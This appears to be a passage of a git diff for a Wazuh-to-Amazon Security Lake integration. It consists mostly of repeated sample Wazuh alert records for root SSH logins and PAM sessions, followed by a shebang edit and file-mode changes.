success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} 
diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index eee82036c3ff5..51f1ab81cb9c6 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 +#!/env/bin/python3 import os import sys diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py old mode 100644 new mode 100755 diff --git a/integrations/docker/amazon-security-lake.yml 